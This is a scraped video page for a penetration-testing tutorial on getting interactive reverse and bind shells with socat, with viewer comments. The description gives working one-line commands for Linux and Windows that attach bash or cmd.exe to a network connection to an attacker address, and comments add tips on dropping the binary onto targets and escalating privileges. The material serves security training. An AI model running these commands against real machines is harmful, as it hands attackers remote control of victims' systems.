How To Get A FULLY Interactive Reverse Shell in Linux OR Windows

Подписаться 15 тыс.

Просмотров 31 тыс.

50% 1

Brought to you by INE (AKA eLearnSecurity) Check out their range of training materials for all things tech here get.ine.com/2h...
Netcat is an amazing tool and is so useful and versatile for penetration tests and even other IT administration tasks. However, it is very limited, especially with Penetration Testing.
A Reverse Shell with Socat will give you a much higher degree of interactivity, even allowing you functionality to edit files in the command line, just like a SSH session.
Commands:
Bind Shell
Victim Linux: socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash
Victim Windows: socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Attacker: socat - TCP4:192.168.1.1:4443
Reverse Shell
Victim Linux: socat TCP4:192.168.168.1:4443 EXEC:/bin/bash
Victim Windows: socat TCP4:192.168.1.1:4443 EXEC:'cmd.exe',pipes
Attacker: socat -d -d TCP4-LISTEN:4443 STDOUT
Encrypted Bind / Reverse Shells
Read this article: erev0s.com/blo...
Links:
__________________________________________
Website: www.jsonsec.com
X: x.com/jsonsec
LinkedIn: / jasonford2
Github: www.github.com...
Buy me a ko-fi: ko-fi.com/jsonsec
About JSON SEC
___________________________________________
JSON SEC is a channel dedicated to helping you advance your cyber security career, whether you're on the Red Team or Blue Team side. Focusing on Training and Course reviews, exam prep guides, career guidance and advice as well as hacking tutorials.
Please consider subscribing if you enjoyed this video.

Опубликовано:

15 окт 2024

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист

Посмотреть позже

Комментарии : 44

@NeerajBhojwani-r4d 8 часов назад

You can usually upgrade the shell using the python command to spawn the upgraded shell but that doesn't work when python isn't installed. This is the best way in those scenarios. Thanks for the simple and to the point video.

@mercury1803 3 года назад

have you tried spawning a tty while using nc, you can also use the stty trick to make sure `Ctrl + C` doesn't kill the process

@mercury1803 3 года назад

I can demonstrate this in TryHackMe's discord if you want, RU-vid comments are slightly clunky...

@JSONSEC 3 года назад

As I said in the video, I've tried a lot of things like fully interactive tty shell, adding key shortcuts etc. But nothing has worked so effortlessly and so smoothly as this

@MarsTheProgrammer 2 года назад

The biggest selling point is that you can encrypt the connection with socat.

@Urbancorax2 3 года назад

thank you for that. Now, show everybody how to socat using ssl, transfer files and something else interesting:)

@BellatrixLugosi 2 года назад

The problem is they dont have socat installed, and any compiler

@JSONSEC 2 года назад

You'd be surprised how common it is

@BellatrixLugosi 2 года назад

@@JSONSEC i have rooted hundreds of linux and bsd server, and they doesn't have socat installed, the way i get fully tty shell is using mostly python pty module

@Mike-cp1tj 6 месяцев назад

but don't you need the target to have socat to be installed? on Windows target isnt this super unlikely

@JSONSEC 6 месяцев назад

Pretty common on Linux, windows you can drop a poweshell one liner

@unam456 Год назад

The Windows 11 isolation core and memory integrity protect against this type of attacks? And if i got filtrated ports, router with firewall, nat, antivirus and PC firewall?

@JSONSEC Год назад

Oh gosh, that's way more than I anticipated for this video. I suppose the scope was more for CTFs

@unam456 Год назад

@@JSONSEC but u maybe know if that things protect me against this type of attacks, am worried because a person was tryin to hack me

@MartinGaertner Год назад

Very great video, thank you very much!

@chileaus 2 года назад

Is there away to reverse shell over the internet?

@_hawk_8681 Год назад

Well, if u wanna do it on WAN, then make sure to look on to port forwarding stuffs and ssh. You can probably use port forwarding with metasploit to do hacking on the internet.

@Carinala8257 2 года назад

I run socat on a windows machine in a cmd with admin rights. but unfortunately i only have user rights in the remote shell after a successful connection. Does anyone have a solution for this ?

@_hawk_8681 Год назад

Get the sudo password of the remote Linux machine, once u have it. Connect to it and then 'sudo su', it will ask for password, enter the password and ur now admin...

@joeljohnson5576 2 года назад

great stuff mann, Thanks

@saurabhkumar1976 3 года назад

Thanks for this 😊

@vikhyatverma4016 2 года назад

It'd be great if i could do that on windows...

@marounahel8205 Год назад

i really liked your video

@JSONSEC Год назад

I really liked your comment

@randomstatements8034 2 года назад

How would this work in windows

@JSONSEC 2 года назад

Simply drop the socat.exe file across and use the same commands :)

@Nexxal Год назад

@@JSONSEC what exe file

@itsme7570 Год назад

Thank you!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!🎉🎉🎉🎉🎉🎉🎉🎉🎉

@SpamSandra-lh3nq 10 месяцев назад

great!!!

@Hartley94 3 года назад

Thank you.

@BrianPrisbe 2 года назад

Awesome

@papahorse3347 3 года назад

ty so much,can you start doing some try to hack me walkthrough videos? your explaining realy good and it would be nice to learn from you more

@JSONSEC 3 года назад

I plan on building my own machines and do walkthroughs. I think there are plenty of other great guys that explain things just as well / if not better than me :)

@skyone9237 3 года назад

Gr8. ❤️❤️

@iakashx 2 года назад

Noice. 👍 Just wanna hightlight some things because I ran into them while doing this. socat file:`tty`,raw,echo=0 tcp-listen:4444 This listener didn't work properly when I tried to get reverse shell from target (say php or any kinda exploit / nc rev shell etc.) Initially I thought this has to do something with bash/zsh. But it wasn't. Finally, I got rev shell on nc first. Got socat is present on target. Then I created another shell with socat. ✌✌ Edit: Modified php-rev-shell to directly give me shell on socat. Better now. :)

@bendomino8476 3 года назад

this is good but not every victim machine will have socat preinstall

@JSONSEC 3 года назад

You'd be surprised how many do. But if it doesn't you can simply transfer the binary instead of a nc or a msfv shell

2 года назад

@@JSONSEC how would you do that? is there a script i can install on the "victim" WINDOWS computer and it automatically installs socat and runs the command to connect? i have been trying for hours to setup a listener on a kali linux virtual machine and connect with my windows computer. can you help? thanks